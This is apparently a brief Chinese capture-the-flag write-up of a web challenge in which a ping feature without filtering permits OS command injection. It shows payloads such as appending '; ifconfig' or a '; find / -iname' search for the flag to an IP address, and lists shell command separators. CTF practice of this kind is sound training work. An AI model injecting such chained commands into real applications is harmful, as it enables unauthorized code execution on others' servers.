CTF-攻防世界-Web-新11-command_execution(命令执行,OS注入)
标签:command 功能 desc lin comm 没有 描述 世界 命令
题目描述:
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
考察内容:
OS注入,命令执行
解答:
ping 127.0.0.1; ifconfig // 可以执行ifconfig系统命令
ping 127.0.0.1; find / -iname "*flag*" // 执行find命令
必要时,可做编码转换和绕过
PHP中调用的是system()函数来执行系统命令的
Linux中,2个命令之间可以使用; && || | 等
CTF-攻防世界-Web-新11-command_execution(命令执行,OS注入)
标签:command 功能 desc lin comm 没有 描述 世界 命令
原文地址:https://www.cnblogs.com/straybugs/p/14449131.html